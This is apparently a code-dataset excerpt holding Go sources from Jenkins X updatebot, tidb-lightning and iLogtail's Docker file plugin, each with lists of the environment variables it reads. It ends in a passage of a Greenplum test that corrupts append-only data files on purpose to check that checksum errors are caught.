"github.com/jenkins-x/jx-helpers/v3/pkg/cobras/helper"
"github.com/jenkins-x/jx-helpers/v3/pkg/cobras/templates"
"github.com/jenkins-x/jx-helpers/v3/pkg/files"
"github.com/jenkins-x/jx-helpers/v3/pkg/gitclient/gitdiscovery"
"github.com/jenkins-x/jx-helpers/v3/pkg/options"
"github.com/jenkins-x/jx-helpers/v3/pkg/termcolor"
"github.com/jenkins-x/jx-helpers/v3/pkg/yamls"
"github.com/jenkins-x/jx-logging/v3/pkg/log"
"github.com/jenkins-x/jx-promote/pkg/environments"
"github.com/pkg/errors"
"github.com/spf13/cobra"
)
var (
info = termcolor.ColorInfo
cmdLong = templates.LongDesc(`
Create a Pull Request on each downstream repository
`)
cmdExample = templates.Examples(`
%s pr --test-url https://github.com/myorg/mytest.git
`)
)
// Options the options for the command
type Options struct {
environments.EnvironmentPullRequestOptions
Dir string
ConfigFile string
Version string
VersionFile string
PullRequestTitle string
PullRequestBody string
GitCommitUsername string
GitCommitUserEmail string
AutoMerge bool
NoVersion bool
GitCredentials bool
Labels []string
TemplateData map[string]interface{}
PullRequestSHAs map[string]string
Helmer helmer.Helmer
GraphQLClient *githubv4.Client
UpdateConfig v1alpha1.UpdateConfig
}
// NewCmdPullRequest creates a command object for the command
func NewCmdPullRequest() (*cobra.Command, *Options) {
o := &Options{}
cmd := &cobra.Command{
Use: "pr",
Short: "Create a Pull Request on each downstream repository",
Long: cmdLong,
Example: fmt.Sprintf(cmdExample, rootcmd.BinaryName),
Run: func(cmd *cobra.Command, args []string) {
err := o.Run()
helper.CheckErr(err)
},
}
cmd.Flags().StringVarP(&o.Dir, "dir", "d", ".", "the directory look for the VERSION file")
cmd.Flags().StringVarP(&o.ConfigFile, "config-file", "c", "", "the updatebot config file. If none specified defaults to .jx/updatebot.yaml")
cmd.Flags().StringVarP(&o.Version, "version", "", "", "the version number to promote. If not specified uses $VERSION or the version file")
cmd.Flags().StringVarP(&o.VersionFile, "version-file", "", "", "the file to load the version from if not specified directly or via a $VERSION environment variable. Defaults to VERSION in the current dir")
cmd.Flags().StringVar(&o.PullRequestTitle, "pull-request-title", "", "the PR title")
cmd.Flags().StringVar(&o.PullRequestBody, "pull-request-body", "", "the PR body")
cmd.Flags().StringVarP(&o.GitCommitUsername, "git-user-name", "", "", "the user name to git commit")
cmd.Flags().StringVarP(&o.GitCommitUserEmail, "git-user-email", "", "", "the user email to git commit")
cmd.Flags().StringSliceVar(&o.Labels, "labels", []string{}, "a list of labels to apply to the PR")
cmd.Flags().BoolVarP(&o.AutoMerge, "auto-merge", "", true, "should we automatically merge if the PR pipeline is green")
cmd.Flags().BoolVarP(&o.NoVersion, "no-version", "", false, "disables validation on requiring a '--version' option or environment variable to be required")
cmd.Flags().BoolVarP(&o.GitCredentials, "git-credentials", "", false, "ensures the git credentials are setup so we can push to git")
o.EnvironmentPullRequestOptions.ScmClientFactory.AddFlags(cmd)
eo := &o.EnvironmentPullRequestOptions
cmd.Flags().StringVarP(&eo.CommitTitle, "commit-title", "", "", "the commit title")
cmd.Flags().StringVarP(&eo.CommitMessage, "commit-message", "", "", "the commit message")
return cmd, o
}
// Run implements the command
func (o *Options) Run() error {
err := o.Validate()
if err != nil {
return errors.Wrapf(err, "failed to validate")
}
if o.PullRequestBody == "" || o.CommitMessage == "" {
// lets try discover the current git URL
gitURL, err := gitdiscovery.FindGitURLFromDir(o.Dir, true)
if err != nil {
log.Logger().Warnf("failed to find git URL %s", err.Error())
} else if gitURL != "" {
message := fmt.Sprintf("from: %s\n", gitURL)
if o.PullRequestBody == "" {
o.PullRequestBody = message
}
if o.CommitMessage == "" {
o.CommitMessage = message
}
}
}
for i := range o.UpdateConfig.Spec.Rules {
rule := &o.UpdateConfig.Spec.Rules[i]
err = o.FindURLs(rule)
if err != nil {
return errors.Wrapf(err, "failed to find URLs")
}
if len(rule.URLs) == 0 {
log.Logger().Warnf("no URLs to process for rule %d", i)
}
for _, gitURL := range rule.URLs {
if gitURL == "" {
log.Logger().Warnf("missing out repository %d as it has no git URL", i)
continue
}
// lets clear the branch name so we create a new one each time in a loop
o.BranchName = ""
source := ""
details := &scm.PullRequest{
Source: source,
Title: o.PullRequestTitle,
Body: o.PullRequestBody,
Draft: false,
}
for _, label := range o.Labels {
details.Labels = append(details.Labels, &scm.Label{
Name: label,
Description: label,
})
}
o.Function = func() error {
dir := o.OutDir
for _, ch := range rule.Changes {
err := o.ApplyChanges(dir, gitURL, ch)
if err != nil {
return errors.Wrapf(err, "failed to apply change")
}
}
if o.PullRequestTitle == "" {
o.PullRequestTitle = fmt.Sprintf("fix: upgrade to version %s", o.Version)
}
if o.CommitTitle == "" {
o.CommitTitle = o.PullRequestTitle
}
return nil
}
// reuse existing PullRequest
if o.AutoMerge {
if o.PullRequestFilter == nil {
o.PullRequestFilter = &environments.PullRequestFilter{}
}
if stringhelpers.StringArrayIndex(o.PullRequestFilter.Labels, environments.LabelUpdatebot) < 0 {
o.PullRequestFilter.Labels = append(o.PullRequestFilter.Labels, environments.LabelUpdatebot)
}
}
pr, err := o.EnvironmentPullRequestOptions.Create(gitURL, "", details, o.AutoMerge)
if err != nil {
return errors.Wrapf(err, "failed to create Pull Request on repository %s", gitURL)
}
if pr == nil {
log.Logger().Infof("no Pull Request created")
continue
}
o.AddPullRequest(pr)
}
}
return nil
}
func (o *Options) Validate() error {
if o.TemplateData == nil {
o.TemplateData = map[string]interface{}{}
}
if o.PullRequestSHAs == nil {
o.PullRequestSHAs = map[string]string{}
}
if o.Version == "" {
if o.VersionFile == "" {
o.VersionFile = filepath.Join(o.Dir, "VERSION")
}
exists, err := files.FileExists(o.VersionFile)
if err != nil {
return errors.Wrapf(err, "failed to check for file %s", o.VersionFile)
}
if exists {
data, err := ioutil.ReadFile(o.VersionFile)
if err != nil {
return errors.Wrapf(err, "failed to read version file %s", o.VersionFile)
}
o.Version = strings.TrimSpace(string(data))
} else {
log.Logger().Infof("version file %s does not exist", o.VersionFile)
}
}
if o.Version == "" {
o.Version = os.Getenv("VERSION")
if o.Version == "" && !o.NoVersion {
return options.MissingOption("version")
}
}
// lets default the config file
if o.ConfigFile == "" {
o.ConfigFile = filepath.Join(o.Dir, ".jx", "updatebot.yaml")
}
exists, err := files.FileExists(o.ConfigFile)
if err != nil {
return errors.Wrapf(err, "failed to check for file %s", o.ConfigFile)
}
if exists {
err = yamls.LoadFile(o.ConfigFile, &o.UpdateConfig)
if err != nil {
return errors.Wrapf(err, "failed to load config file %s", o.ConfigFile)
}
} else {
log.Logger().Warnf("file %s does not exist so cannot create any updatebot Pull Requests", o.ConfigFile)
}
if o.Helmer == nil {
o.Helmer = helmer.NewHelmCLIWithRunner(o.CommandRunner, "helm", o.Dir, false)
}
// lazy create the git client
g := o.EnvironmentPullRequestOptions.Git()
_, _, err = gitclient.EnsureUserAndEmailSetup(g, o.Dir, o.GitCommitUsername, o.GitCommitUserEmail)
if err != nil {
return errors.Wrapf(err, "failed to setup git user and email")
}
// lets try default the git user/token
if o.ScmClientFactory.GitToken == "" {
if o.ScmClientFactory.GitServerURL == "" {
// lets try discover the git URL
discover := &scmhelpers.Options{
Dir: o.Dir,
GitClient: o.Git(),
CommandRunner: o.CommandRunner,
DiscoverFromGit: true,
}
err := discover.Validate()
if err != nil {
return errors.Wrapf(err, "failed to discover repository details")
}
o.ScmClientFactory.GitServerURL = discover.GitServerURL
o.ScmClientFactory.GitToken = discover.GitToken
}
if o.ScmClientFactory.GitServerURL == "" {
return errors.Errorf("no git-server could be found")
}
err = o.ScmClientFactory.FindGitToken()
if err != nil {
return errors.Wrapf(err, "failed to find git token")
}
}
if o.GitCommitUsername == "" {
o.GitCommitUsername = o.ScmClientFactory.GitUsername
}
if o.GitCommitUsername == "" {
o.GitCommitUsername = os.Getenv("GIT_USERNAME")
}
if o.GitCommitUsername == "" {
o.GitCommitUsername = "jenkins-x-bot"
}
if o.GitCredentials {
if o.ScmClientFactory.GitToken == "" {
return errors.Errorf("missing git token environment variable. Try setting GIT_TOKEN or GITHUB_TOKEN")
}
_, gc := setup.NewCmdGitSetup()
gc.Dir = o.Dir
gc.DisableInClusterTest = true
gc.UserEmail = o.GitCommitUserEmail
gc.UserName = o.GitCommitUsername
gc.Password = o.ScmClientFactory.GitToken
gc.GitProviderURL = "https://github.com"
err = gc.Run()
if err != nil {
return errors.Wrapf(err, "failed to setup git credentials file")
}
log.Logger().Infof("setup git credentials file for user %s and email %s", gc.UserName, gc.UserEmail)
}
return nil
}
// ApplyChanges applies the changes to the given dir
func (o *Options) ApplyChanges(dir, gitURL string, change v1alpha1.Change) error {
if change.Go != nil {
return o.ApplyGo(dir, gitURL, change, change.Go)
}
if change.Regex != nil {
return o.ApplyRegex(dir, gitURL, change, change.Regex)
}
if change.VersionStream != nil {
return o.ApplyVersionStream(dir, gitURL, change, change.VersionStream)
}
log.Logger().Infof("ignoring unknown change %#v", change)
return nil
}
func (o *Options) FindURLs(rule *v1alpha1.Rule) error {
for _, change := range rule.Changes {
if change.Go != nil {
err := o.GoFindURLs(rule, change, change.Go)
if err != nil {
return errors.Wrapf(err, "failed to find go repositories to update")
}
}
}
return nil
}
|
[
"\"VERSION\"",
"\"GIT_USERNAME\""
] |
[] |
[
"VERSION",
"GIT_USERNAME"
] |
[]
|
["VERSION", "GIT_USERNAME"]
|
go
| 2 | 0 | |
cmd/tidb-lightning/main.go
|
// Copyright 2019 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"fmt"
"os"
"os/signal"
"runtime/debug"
"syscall"
"github.com/pingcap/tidb-lightning/lightning"
"github.com/pingcap/tidb-lightning/lightning/config"
"github.com/pingcap/tidb-lightning/lightning/log"
"go.uber.org/zap"
)
func main() {
cfg := config.Must(config.LoadGlobalConfig(os.Args[1:], nil))
fmt.Fprintf(os.Stdout, "Verbose debug logs will be written to %s.\n\n", cfg.App.Config.File)
app := lightning.New(cfg)
sc := make(chan os.Signal, 1)
signal.Notify(sc,
syscall.SIGHUP,
syscall.SIGINT,
syscall.SIGTERM,
syscall.SIGQUIT)
go func() {
sig := <-sc
log.L().Info("got signal to exit", zap.Stringer("signal", sig))
app.Stop()
}()
logger := log.L()
// Lightning allocates too many transient objects and heap size is small,
// so garbage collections happen too frequently and lots of time is spent in GC component.
//
// In a test of loading the table `order_line.csv` of 14k TPCC.
// The time need of `encode kv data and write` step reduce from 52m4s to 37m30s when change
// GOGC from 100 to 500, the total time needed reduce near 15m too.
// The cost of this is the memory of lightnin at runtime grow from about 200M to 700M, but it's acceptable.
// So we set the gc percentage as 500 default to reduce the GC frequency instead of 100.
//
// Local mode need much more memory than importer/tidb mode, if the gc percentage is too high,
// lightning memory usage will also be high.
if cfg.TikvImporter.Backend != config.BackendLocal {
gogc := os.Getenv("GOGC")
if gogc == "" {
old := debug.SetGCPercent(500)
log.L().Debug("set gc percentage", zap.Int("old", old), zap.Int("new", 500))
}
}
err := app.GoServe()
if err != nil {
logger.Error("failed to start HTTP server", zap.Error(err))
fmt.Fprintln(os.Stderr, "failed to start HTTP server:", err)
return
}
if cfg.App.ServerMode {
err = app.RunServer()
} else {
err = app.RunOnce()
}
if err != nil {
logger.Error("tidb lightning encountered error stack info", zap.Error(err))
logger.Error("tidb lightning encountered error", log.ShortError(err))
fmt.Fprintln(os.Stderr, "tidb lightning encountered error: ", err)
} else {
logger.Info("tidb lightning exit")
fmt.Fprintln(os.Stdout, "tidb lightning exit")
}
syncErr := logger.Sync()
if syncErr != nil {
fmt.Fprintln(os.Stderr, "sync log failed", syncErr)
}
if err != nil {
os.Exit(1)
}
}
|
[
"\"GOGC\""
] |
[] |
[
"GOGC"
] |
[]
|
["GOGC"]
|
go
| 1 | 0 | |
plugins/input/docker/logmeta/metric_docker_file.go
|
// Copyright 2021 iLogtail Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//go:build linux || windows
// +build linux windows
package logmeta
import (
"encoding/json"
"fmt"
"os"
"regexp"
"strings"
"time"
"github.com/alibaba/ilogtail"
"github.com/alibaba/ilogtail/helper"
"github.com/alibaba/ilogtail/pkg/logger"
"github.com/alibaba/ilogtail/pkg/logtail"
)
const (
PluginDockerUpdateFile = 1
PluginDockerDeleteFile = 2
PluginDockerUpdateFileAll = 3
)
type DockerFileUpdateCmd struct {
ID string
Path string
Tags []string
}
type DockerFileUpdateCmdAll struct {
AllCmd []DockerFileUpdateCmd
}
type InputDockerFile struct {
IncludeLabel map[string]string // Deprecated: use IncludeContainerLabel and IncludeK8sLabel instead.
ExcludeLabel map[string]string // Deprecated: use ExcludeContainerLabel and ExcludeK8sLabel instead.
IncludeEnv map[string]string
ExcludeEnv map[string]string
IncludeContainerLabel map[string]string
ExcludeContainerLabel map[string]string
IncludeK8sLabel map[string]string
ExcludeK8sLabel map[string]string
ExternalEnvTag map[string]string
ExternalK8sLabelTag map[string]string
LogPath string
MountPath string
HostFlag bool
K8sNamespaceRegex string
K8sPodRegex string
K8sContainerRegex string
includeLabelRegex map[string]*regexp.Regexp
excludeLabelRegex map[string]*regexp.Regexp
includeEnvRegex map[string]*regexp.Regexp
excludeEnvRegex map[string]*regexp.Regexp
k8sFilter *helper.K8SFilter
dockerCenter *helper.DockerCenter
lastPathMappingCache map[string]string
context ilogtail.Context
lastClearTime time.Time
updateEmptyFlag bool
avgInstanceMetric ilogtail.CounterMetric
addMetric ilogtail.CounterMetric
updateMetric ilogtail.CounterMetric
deleteMetric ilogtail.CounterMetric
lastUpdateTime int64
// Last return of GetAllAcceptedInfoV2
fullList map[string]bool
matchList map[string]*helper.DockerInfoDetail
}
func formatPath(path string) string {
if len(path) == 0 {
return path
}
if path[len(path)-1] == '/' {
return path[0 : len(path)-1]
}
if path[len(path)-1] == '\\' {
return path[0 : len(path)-1]
}
return path
}
func (idf *InputDockerFile) Name() string {
return "InputDockerFile"
}
func (idf *InputDockerFile) Init(context ilogtail.Context) (int, error) {
idf.context = context
idf.lastPathMappingCache = make(map[string]string)
idf.fullList = make(map[string]bool)
idf.matchList = make(map[string]*helper.DockerInfoDetail)
// Because docker on Windows will convert all mounted path to lowercase (see
// Mounts field in output of docker inspect), so we have to change LogPath to
// lowercase if it is a Windows path (with colon).
idf.LogPath = formatPath(idf.LogPath)
if colonPos := strings.Index(idf.LogPath, ":"); colonPos != -1 {
idf.LogPath = strings.ToLower(idf.LogPath)
}
idf.lastClearTime = time.Now()
if len(idf.LogPath) <= 1 {
return 0, fmt.Errorf("empty log path")
}
idf.dockerCenter = helper.GetDockerCenterInstance()
if idf.HostFlag {
idf.MountPath = ""
} else if envPath := os.Getenv("ALIYUN_LOGTAIL_MOUNT_PATH"); len(envPath) > 0 {
if envPath[len(envPath)-1] == '/' || envPath[len(envPath)-1] == '\\' {
envPath = envPath[0 : len(envPath)-1]
}
idf.MountPath = envPath
} else {
idf.MountPath = helper.DefaultLogtailMountPath
}
idf.updateEmptyFlag = true
idf.avgInstanceMetric = helper.NewAverageMetric("container_count")
idf.addMetric = helper.NewCounterMetric("add_container")
idf.deleteMetric = helper.NewCounterMetric("remove_container")
idf.updateMetric = helper.NewCounterMetric("update_container")
idf.context.RegisterCounterMetric(idf.avgInstanceMetric)
idf.context.RegisterCounterMetric(idf.addMetric)
idf.context.RegisterCounterMetric(idf.deleteMetric)
idf.context.RegisterCounterMetric(idf.updateMetric)
var err error
idf.IncludeEnv, idf.includeEnvRegex, err = helper.SplitRegexFromMap(idf.IncludeEnv)
if err != nil {
logger.Warning(idf.context.GetRuntimeContext(), "INVALID_REGEX_ALARM", "init include env regex error", err)
}
idf.ExcludeEnv, idf.excludeEnvRegex, err = helper.SplitRegexFromMap(idf.ExcludeEnv)
if err != nil {
logger.Warning(idf.context.GetRuntimeContext(), "INVALID_REGEX_ALARM", "init exclude env regex error", err)
}
if idf.IncludeLabel != nil {
for k, v := range idf.IncludeContainerLabel {
idf.IncludeLabel[k] = v
}
} else {
idf.IncludeLabel = idf.IncludeContainerLabel
}
if idf.ExcludeLabel != nil {
for k, v := range idf.ExcludeContainerLabel {
idf.ExcludeLabel[k] = v
}
} else {
idf.ExcludeLabel = idf.ExcludeContainerLabel
}
idf.IncludeLabel, idf.includeLabelRegex, err = helper.SplitRegexFromMap(idf.IncludeLabel)
if err != nil {
logger.Warning(idf.context.GetRuntimeContext(), "INVALID_REGEX_ALARM", "init include label regex error", err)
}
idf.ExcludeLabel, idf.excludeLabelRegex, err = helper.SplitRegexFromMap(idf.ExcludeLabel)
if err != nil {
logger.Warning(idf.context.GetRuntimeContext(), "INVALID_REGEX_ALARM", "init exclude label regex error", err)
}
idf.k8sFilter, err = helper.CreateK8SFilter(idf.K8sNamespaceRegex, idf.K8sPodRegex, idf.K8sContainerRegex, idf.IncludeK8sLabel, idf.ExcludeK8sLabel)
return 3000, err
}
func (idf *InputDockerFile) Description() string {
return "docker file plugin for logtail"
}
func (idf *InputDockerFile) addMappingToLogtail(info *helper.DockerInfoDetail, destPath string, allCmd *DockerFileUpdateCmdAll) {
var cmd DockerFileUpdateCmd
cmd.ID = info.ContainerInfo.ID
cmd.Path = destPath
tags := info.GetExternalTags(idf.ExternalEnvTag, idf.ExternalK8sLabelTag)
cmd.Tags = make([]string, 0, len(tags)*2)
for key, val := range tags {
cmd.Tags = append(cmd.Tags, key)
cmd.Tags = append(cmd.Tags, val)
}
cmdBuf, _ := json.Marshal(&cmd)
configName := idf.context.GetConfigName()
if allCmd != nil {
allCmd.AllCmd = append(allCmd.AllCmd, cmd)
return
}
if err := logtail.ExecuteCMD(configName, PluginDockerUpdateFile, cmdBuf); err != nil {
logger.Error(idf.context.GetRuntimeContext(), "DOCKER_FILE_MAPPING_ALARM", "cmd", cmdBuf, "error", err)
}
}
func (idf *InputDockerFile) deleteMappingFromLogtail(id string) {
var cmd DockerFileUpdateCmd
cmd.ID = id
logger.Info(idf.context.GetRuntimeContext(), "deleteMappingFromLogtail cmd", cmd)
cmdBuf, _ := json.Marshal(&cmd)
configName := idf.context.GetConfigName()
if err := logtail.ExecuteCMD(configName, PluginDockerDeleteFile, cmdBuf); err != nil {
logger.Error(idf.context.GetRuntimeContext(), "DOCKER_FILE_MAPPING_ALARM", "cmd", cmdBuf, "error", err)
}
}
func (idf *InputDockerFile) updateAll(allCmd *DockerFileUpdateCmdAll) {
logger.Info(idf.context.GetRuntimeContext(), "update all", len(allCmd.AllCmd))
cmdBuf, _ := json.Marshal(allCmd)
configName := idf.context.GetConfigName()
if err := logtail.ExecuteCMD(configName, PluginDockerUpdateFileAll, cmdBuf); err != nil {
logger.Error(idf.context.GetRuntimeContext(), "DOCKER_FILE_MAPPING_ALARM", "cmd", cmdBuf, "error", err)
}
}
func (idf *InputDockerFile) updateMapping(info *helper.DockerInfoDetail, sourcePath, containerPath string, allCmd *DockerFileUpdateCmdAll) {
sourcePath = formatPath(sourcePath)
containerPath = formatPath(containerPath)
destPath := helper.GetMountedFilePathWithBasePath(idf.MountPath, sourcePath) + idf.LogPath[len(containerPath):]
if val, ok := idf.lastPathMappingCache[info.ContainerInfo.ID]; ok && val != sourcePath {
// send delete first and then add this info
idf.updateMetric.Add(1)
logger.Info(idf.context.GetRuntimeContext(), "container mapping", "changed", "last", val, "source host path", sourcePath, "destination container path", containerPath, "destination log path", destPath, "id", info.ContainerInfo.ID, "name", info.ContainerInfo.Name)
idf.lastPathMappingCache[info.ContainerInfo.ID] = sourcePath
idf.addMappingToLogtail(info, destPath, allCmd)
} else if !ok {
idf.addMetric.Add(1)
logger.Info(idf.context.GetRuntimeContext(), "container mapping", "added", "source host path", sourcePath, "destination container path", containerPath, "destination log path", destPath, "id", info.ContainerInfo.ID, "name", info.ContainerInfo.Name)
idf.lastPathMappingCache[info.ContainerInfo.ID] = sourcePath
idf.addMappingToLogtail(info, destPath, allCmd)
}
}
func (idf *InputDockerFile) deleteMapping(id string) {
idf.deleteMappingFromLogtail(id)
logger.Info(idf.context.GetRuntimeContext(), "container mapping", "deleted", "source path", idf.lastPathMappingCache[id], "id", id)
delete(idf.lastPathMappingCache, id)
}
func (idf *InputDockerFile) Collect(collector ilogtail.Collector) error {
newUpdateTime := idf.dockerCenter.GetLastUpdateMapTime()
if idf.lastUpdateTime != 0 {
// Nothing update, just skip.
if idf.lastUpdateTime >= newUpdateTime {
return nil
}
}
var allCmd *DockerFileUpdateCmdAll
allCmd = nil
// if cache is empty, use update all cmd
if len(idf.lastPathMappingCache) == 0 {
allCmd = new(DockerFileUpdateCmdAll)
}
newCount, delCount := idf.dockerCenter.GetAllAcceptedInfoV2(
idf.fullList, idf.matchList,
idf.IncludeLabel, idf.ExcludeLabel,
idf.includeLabelRegex, idf.excludeLabelRegex,
idf.IncludeEnv, idf.ExcludeEnv,
idf.includeEnvRegex, idf.excludeEnvRegex,
idf.k8sFilter)
idf.lastUpdateTime = newUpdateTime
if newCount != 0 || delCount != 0 {
logger.Infof(idf.context.GetRuntimeContext(), "update match list, new: %v, delete: %v", newCount, delCount)
// Can not return here because we should notify empty update to clear
// cache in docker_path_config.json.
}
dockerInfoDetails := idf.matchList
idf.avgInstanceMetric.Add(int64(len(dockerInfoDetails)))
for _, info := range dockerInfoDetails {
sourcePath, containerPath := info.FindBestMatchedPath(idf.LogPath)
logger.Debugf(idf.context.GetRuntimeContext(), "container(%s-%s) bestMatchedPath for %s : sourcePath-%s, containerPath-%s",
info.ContainerInfo.ID, info.ContainerInfo.Name, idf.LogPath, sourcePath, containerPath)
if len(sourcePath) > 0 {
idf.updateMapping(info, sourcePath, containerPath, allCmd)
} else {
logger.Warning(idf.context.GetRuntimeContext(), "DOCKER_FILE_MATCH_ALARM", "unknow error", "can't find path from this container", "path", idf.LogPath, "container", info.ContainerInfo.Name)
}
}
for id := range idf.lastPathMappingCache {
if _, ok := dockerInfoDetails[id]; !ok {
idf.deleteMetric.Add(1)
idf.deleteMapping(id)
}
}
if allCmd != nil {
if len(allCmd.AllCmd) == 0 {
// only update empty if empty flag is true
if idf.updateEmptyFlag {
idf.updateAll(allCmd)
idf.updateEmptyFlag = false
}
} else {
idf.updateAll(allCmd)
idf.updateEmptyFlag = true
}
}
if time.Since(idf.lastClearTime) > time.Hour {
idf.lastPathMappingCache = make(map[string]string)
idf.lastClearTime = time.Now()
}
return nil
}
func init() {
ilogtail.MetricInputs["metric_docker_file"] = func() ilogtail.MetricInput {
return &InputDockerFile{}
}
}
|
[
"\"ALIYUN_LOGTAIL_MOUNT_PATH\""
] |
[] |
[
"ALIYUN_LOGTAIL_MOUNT_PATH"
] |
[]
|
["ALIYUN_LOGTAIL_MOUNT_PATH"]
|
go
| 1 | 0 | |
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/access_methods/appendonly_checksum/test_appendonly_checksum_scenario.py
|
"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import glob
import sys
import tinctest
import commands
from mpp.lib.PSQL import PSQL
from mpp.models import MPPTestCase
from tinctest.lib import local_path, Gpdiff
from tinctest.models.scenario import ScenarioTestCase
from mpp.gpdb.tests.storage.lib.gp_filedump import GpfileTestCase
from gppylib.commands.base import Command, ExecutionError
class CONST(object):
''' For test_ao_checksum_corruption '''
HEADER_OFFSET = 8
DATA_OFFSET = -3
FIND_CHAR = 'a'
CORRUPTION = '*'
ERR_MSG = 'ERROR: Header checksum does not match'
BOF = 0
EOF = 2
''' For test_aochecksum_size '''
CHKSUM_OFF = 'off'
CHKSUM_ON = 'on'
SMALL_HEADER_LEN_WITH_CHKSUM_ON = 'headerLen: 24'
SMALL_HEADER_LEN_WITH_CHKSUM_OFF = 'headerLen: 16'
LARGE_HEADER_LEN_WITH_CHKSUM_ON = 'headerLen: 24'
LARGE_HEADER_LEN_WITH_CHKSUM_OFF = 'headerLen: 16'
BULKDENSE_HEADER_LEN_WITH_CHKSUM_ON = 'headerLen: 32'
BULKDENSE_HEADER_LEN_WITH_CHKSUM_OFF = 'headerLen: 24'
SMALL_HEADER_TYPE = 'AoHeaderKind_SmallContent'
LARGE_HEADER_TYPE = 'AoHeaderKind_LargeContent'
BULKDENSE_HEADER_TYPE = 'DatumStreamVersion_Dense'
class AppendonlyChecksumTestCase(ScenarioTestCase, MPPTestCase):
'''
@gucs gp_create_table_random_default_distribution=off
@dbname gptest
@description Test for Appendonly Checksum
@product_version gpdb: [4.3.4.0-]
'''
def __init__(self, methodName):
super(AppendonlyChecksumTestCase,self).__init__(methodName)
self.gpfile = GpfileTestCase()
self.dbname=os.environ.get('PGDATABASE')
@classmethod
def setUpClass(cls):
base_dir = os.path.dirname(sys.modules[cls.__module__].__file__)
test_out_dir=os.path.join( base_dir,"output_scenario")
try:
os.mkdir(test_out_dir)
except OSError as e:
tinctest.logger.info( "create output_scenario dir error %s " % format(e.strerror))
@classmethod
def create_table(cls,tab_name):
base_dir = os.path.dirname(sys.modules[cls.__module__].__file__)
sql_file = os.path.join( base_dir, "sql_scenario", tab_name + ".sql");
ans_file = os.path.join( base_dir, "expected_scenario", tab_name + ".ans");
out_file = os.path.join( base_dir, "output_scenario", tab_name + ".out");
''' Run the provided sql and validate it '''
PSQL.run_sql_file(sql_file,out_file=out_file)
''' Compare the out and ans files '''
result = Gpdiff.are_files_equal(out_file, ans_file)
errmsg='Gpdiff are not equal for file '+ sql_file
assert result, errmsg
@classmethod
def select_table(cls,tab_name, noncorrupted_checksum=True):
base_dir = os.path.dirname(sys.modules[cls.__module__].__file__)
sql_file = os.path.join( base_dir, "sql_scenario", tab_name + ".sql");
ans_file = os.path.join( base_dir, "expected_scenario", tab_name + ".ans");
out_file = os.path.join( base_dir, "output_scenario", tab_name + ".out");
''' Run the provided sql and validate it '''
PSQL.run_sql_file(sql_file,out_file=out_file)
if noncorrupted_checksum:
''' Compare the out and ans files '''
result = Gpdiff.are_files_equal(out_file, ans_file)
errmsg='Gpdiff are not equal for file '+ sql_file
assert result, errmsg
else:
''' Verification for corruption case '''
find_msg="grep -c " +"'"+ CONST.ERR_MSG + "' "+out_file
tinctest.logger.info('Find Error Message : %s ' % find_msg)
status, result=commands.getstatusoutput(find_msg)
assert(result > 0),"Did not find message " + msg
def test_ao_checksum_corruption(self):
'''
The following test simulates corruption of header and data content and verifies the select behavior
on this corrupted table.
The test also verifies the behavior of GUC gp_appendonly_verify_block_checksums(on/off) if the last data-block is
corrupted
PARAMETERS (via data_provider):
0. Test Name
1. Sql file to create scenario. This is also used in verification because for every test sql file
there is also a count_ sql file. (verify_sql variable below is populated with this value for each test)
2. Starting position in data file from where position will be calculated for corruption
3. (For appendonly_verify_block_checksums_co test only) The character in the data file that will be
flipped with uppercase to simulate the corruption of the last record, Resulting in different checksum
3. (All others) Location in data file that will be corrupted. CONST.CORRUPTION will be used as new character
that will be used to overwrite a location in data file,resulting in different checksum
STEPS :
1. Create table of required type of header (large header_content or small header_content (ao/co)
2. Find the data file for this relationship
3. Take a backup before corruption
4. For appendonly_verify_block_checksums_co test, from the eof find the first occurance of CONST.FIND_CHAR
For all others from corruption_start position find corruption_offset location. For tests that corrupt the
header content the corruption_start is bof and for tests that corrupt the data content the start position
is eof.
5. Run the count_ sql corrosponding to the test and verify that the out file contains CONST.ERR_MSG
6. Replace the corrupt data file with the original file (see step 3)
7. ReRun the count_ sql corrosponding to the test and verify that it passes its comparison with ans file
@data_provider data_provider_for_checksum_corruption
'''
test_name = self.test_data[0]
tab_name = self.test_data[1][0]
corruption_start = self.test_data[1][1]
corruption_offset = 0
corruption_char= ''
if type(self.test_data[1][2]) == type(0) :
'''
Find the location that will be corrupted for all tests except appendonly_verify_block_checksums_co
'''
corruption_offset = self.test_data[1][2]
else:
'''
Find the character that will be flipped with the reverse case for test appendonly_verify_block_checksums_co only
'''
corruption_char=self.test_data[1][2]
tinctest.logger.info('=======================================')
tinctest.logger.info('Starting Test %s' % test_name)
tinctest.logger.info('Table Name %s' % tab_name)
tinctest.logger.info('corruption start position %s' % corruption_start)
tinctest.logger.info('corruption offset position %s' % corruption_offset)
tinctest.logger.info('corruption character %s' % corruption_char)
tinctest.logger.info('=======================================')
self.create_table(tab_name)
(host, db_path) = self.gpfile.get_host_and_db_path(self.dbname)
tinctest.logger.info('Hostname=%s data_directory=%s' %(host,db_path))
file_list = self.gpfile.get_relfile_list(self.dbname, tab_name, db_path, host)
data_file=db_path+'/'+file_list[0]
''' Take a backup of the data file before corruption '''
cmd = "cp -f "+ data_file +" " + data_file +".bak"
tinctest.logger.info("Backup data-file : %s" % cmd)
Command("Backup data-file", cmd).run(validateAfter=True)
try:
with open(data_file , "r+") as f:
char_location=0
write_char=CONST.CORRUPTION
verify_sql='count_'+tab_name
''' For appendonly_verify_block_checksums test only '''
if corruption_char == CONST.FIND_CHAR:
while (True):
char_location +=(-1)
